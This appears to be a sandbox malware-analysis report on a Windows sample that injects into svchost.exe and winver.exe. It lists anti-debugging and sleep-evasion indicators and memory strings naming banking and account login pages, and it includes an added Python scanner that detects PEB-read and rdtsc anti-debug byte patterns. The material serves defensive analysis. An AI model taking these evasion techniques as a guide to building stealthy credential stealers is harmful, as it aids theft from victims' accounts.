                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_08704899 push ebp; ret 11_2_087048AA
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_0870710E push eax; retf 11_2_0870710F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_08702A5E push ss; retf 11_2_08702A64
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_08707BC2 push esp; retf 11_2_08707BC3
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_08704C49 pushfd ; ret 11_2_08704C8F
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_086FB4BF push ebx; iretd 11_2_086FB4C0
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_086FAED9 push esp; ret 11_2_086FAEDC
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe | Code function: 11_2_086FB77E push cs; ret 11_2_086FB784
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005148D7
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00595376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00595376
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00533187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00533187
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\winver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\z6tNjJC614.exe | API/Special instruction interceptor: Address: 10371DC
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\winver.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0397096E rdtsc 8_2_0397096E
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exe | API coverage: 2.6 %
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe TID: 7684 | Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe TID: 7684 | Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\winver.exe TID: 7664 | Thread sleep count: 39 > 30
                Source: C:\Windows\SysWOW64\winver.exe TID: 7664 | Thread sleep time: -78000s >= -30000s
                Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0057445A
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057C6D1 FindFirstFileW,FindClose, 0_2_0057C6D1
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0057C75C
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0057EF95
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0057F0F2
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0057F3F3
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005737EF
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_00573B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00573B12
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_0057BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0057BCBC
                Source: C:\Windows\SysWOW64\winver.exe | Code function: 12_2_004AC740 FindFirstFileW,FindNextFileW,FindClose, 12_2_004AC740
                Source: C:\Users\user\Desktop\z6tNjJC614.exe | Code function: 0_2_005149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005149A0
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs - HKVMware20,11696492231]
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 341G64J42.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 341G64J42.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,1169649=FE
                Source: 341G64J42.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware2
                Source: 341G64J42.12.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zure.comVMware20,11696492231j
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l.comVMware20,11696492231h
                Source: 341G64J42.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 341G64J42.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 341G64J42.12.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: winver.exe, 0000000C.00000002.3125210313.0000000000775000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.1985824719.000002800068E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231~
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: merica.comVMware
                Source: 341G64J42.12.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 341G64J42.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 341G64J42.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .comVMware20,11696492231t
                Source: 341G64J42.12.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 341G64J42.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 341G64J42.12.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 341G64J42.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 341G64J42.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: tFEgkRNveR.exe, 0000000B.00000002.3127494232.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll85
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 341G64J42.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 341G64J42.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 341G64J42.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: saction PasswordVMware20,11696492231^
                Source: 341G64J42.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\z6tNjJC614.exe API call chain: ExitProcess graph end node (graph_0-100924)
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\winver.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E rdtsc 8_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417A83 LdrLoadDll,8_2_00417A83
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00583F09 BlockInput,0_2_00583F09
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00513B3A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00545A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00545A7C
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00514B37 LoadLibraryA,GetProcAddress,0_2_00514B37
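The debugger checks listed above (the DebugPort query, the rdtsc timing read, IsDebuggerPresent, and the OutputDebugString/GetLastError trick) and the long run of `mov eax, dword ptr fs:[00000030h]` entries that follow are one technique seen at two levels. On 32-bit Windows FS points at the TEB, TEB+0x30 holds the PEB pointer, and kernel32!IsDebuggerPresent is itself just that read followed by a test of PEB.BeingDebugged at offset 2; malware that inlines the read avoids the import, which is why the injected svchost.exe code shows hundreds of raw fs:[30h] reads and few named API calls. The scanner below is an added example written for this report, not Joe Sandbox code and not the sample's own logic: it finds those encodings in a dumped code region, labels which PEB field each eax-based read goes on to probe, and pairs nearby rdtsc instructions into timing checks. The byte buffer and the base address are constructed for illustration.

```python
"""
Byte-pattern scan for the 32-bit anti-debug idioms a sandbox report lists
as "mov eax, dword ptr fs:[00000030h]" (TEB->PEB pointer read) and "rdtsc".
Added example, not Joe Sandbox code. SAMPLE and BASE are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# 0x64 is the FS segment-override prefix. Compilers usually emit the eax
# form as 64 A1 <moffs32>; every other register needs the 8B /r encoding.
PEB_READS = {
    "mov eax, fs:[30h]": rb"\x64(?:\xA1|\x8B\x05)\x30\x00\x00\x00",
    "mov ecx, fs:[30h]": rb"\x64\x8B\x0D\x30\x00\x00\x00",
    "mov ebx, fs:[30h]": rb"\x64\x8B\x1D\x30\x00\x00\x00",
    "mov esi, fs:[30h]": rb"\x64\x8B\x35\x30\x00\x00\x00",
}
RDTSC = rb"\x0F\x31"

# What the code does with the PEB pointer says which check it is. Only the
# eax form is classified, because these follow-on encodings use eax as base.
PEB_FIELD_PROBES = (
    (b"\x0F\xB6\x40\x02", "BeingDebugged"),  # movzx eax, byte ptr [eax+2]
    (b"\x8A\x40\x02",     "BeingDebugged"),  # mov al, byte ptr [eax+2]
    (b"\x80\x78\x02\x00", "BeingDebugged"),  # cmp byte ptr [eax+2], 0
    (b"\x8B\x40\x68",     "NtGlobalFlag"),   # mov eax, [eax+68h]
    (b"\xF6\x40\x68\x70", "NtGlobalFlag"),   # test byte ptr [eax+68h], 70h
    (b"\x8B\x40\x18",     "ProcessHeap"),    # mov eax, [eax+18h] (heap Flags/ForceFlags)
)


@dataclass(frozen=True)
class Hit:
    address: int
    mnemonic: str
    field: Optional[str]  # PEB field probed right after the read, if recognised


def scan(code: bytes, base: int) -> list[Hit]:
    """Return every PEB read and rdtsc in `code`, ordered by address.
    This is a raw byte scan, not a disassembly: a pattern can also match
    inside another instruction's operand, so treat hits as leads to verify."""
    hits = []
    for mnemonic, pattern in PEB_READS.items():
        for m in re.finditer(pattern, code):
            field = None
            if mnemonic.startswith("mov eax"):
                tail = code[m.end():m.end() + 4]
                for probe, name in PEB_FIELD_PROBES:
                    if tail.startswith(probe):
                        field = name
                        break
            hits.append(Hit(base + m.start(), mnemonic, field))
    for m in re.finditer(RDTSC, code):
        hits.append(Hit(base + m.start(), "rdtsc", None))
    return sorted(hits, key=lambda h: h.address)


def summarize(hits: list[Hit]) -> dict[str, int]:
    """Per-mnemonic counts, the same view the report gives per function."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.mnemonic] = counts.get(h.mnemonic, 0) + 1
    return counts


def rdtsc_pairs(hits: list[Hit], max_gap: int = 64) -> list[tuple[int, int]]:
    """Two rdtsc within `max_gap` bytes is the usual execution-timing check."""
    ts = [h.address for h in hits if h.mnemonic == "rdtsc"]
    return [(a, b) for a, b in zip(ts, ts[1:]) if b - a <= max_gap]


# Constructed sample code region: an inlined IsDebuggerPresent, an
# ecx-based PEB read, an rdtsc pair around a few nops, and an
# NtGlobalFlag probe. Not bytes from the analysed sample.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85C0"            # test eax, eax
    "7505"            # jnz +5
    "9090909090"      # nop x5
    "648B0D30000000"  # mov ecx, fs:[30h]
    "0F31"            # rdtsc
    "8BD8"            # mov ebx, eax
    "90909090"        # nop x4
    "0F31"            # rdtsc
    "2BC3"            # sub eax, ebx
    "64A130000000"    # mov eax, fs:[30h]
    "8B4068"          # mov eax, [eax+68h]            ; PEB.NtGlobalFlag
    "83E070"          # and eax, 70h                  ; heap debug flags
)
BASE = 0x03970000  # assumed load address, chosen to resemble the report's region

if __name__ == "__main__":
    found = scan(SAMPLE, BASE)
    for h in found:
        suffix = f"  -> PEB.{h.field}" if h.field else ""
        print(f"{h.address:08X}  {h.mnemonic}{suffix}")
    print(summarize(found))
    print("timing pairs:", [(f"{a:08X}", f"{b:08X}") for a, b in rdtsc_pairs(found)])
```

Run against a real dump, feed `scan()` the bytes of the injected region (here the 0x0392xxxx-0x03A0xxxx range in svchost.exe) with its base address; the per-field labels separate the BeingDebugged reads that IsDebuggerPresent would also catch from the NtGlobalFlag and heap-flag probes that only inlined code performs. Because the scan works on raw bytes, confirm each hit in a disassembler before reporting it.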
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_01037448 mov eax, dword ptr fs:[00000030h]0_2_01037448
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_010374A8 mov eax, dword ptr fs:[00000030h]0_2_010374A8
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_01035E38 mov eax, dword ptr fs:[00000030h]0_2_01035E38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395438F mov eax, dword ptr fs:[00000030h]8_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395438F mov eax, dword ptr fs:[00000030h]8_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov ecx, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D43D4 mov eax, dword ptr fs:[00000030h]8_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D43D4 mov eax, dword ptr fs:[00000030h]8_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC3CD mov eax, dword ptr fs:[00000030h]8_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B63C0 mov eax, dword ptr fs:[00000030h]8_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039663FF mov eax, dword ptr fs:[00000030h]8_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C310 mov ecx, dword ptr fs:[00000030h]8_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov ecx, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03950310 mov ecx, dword ptr fs:[00000030h]8_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov ecx, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FA352 mov eax, dword ptr fs:[00000030h]8_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D8350 mov ecx, dword ptr fs:[00000030h]8_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
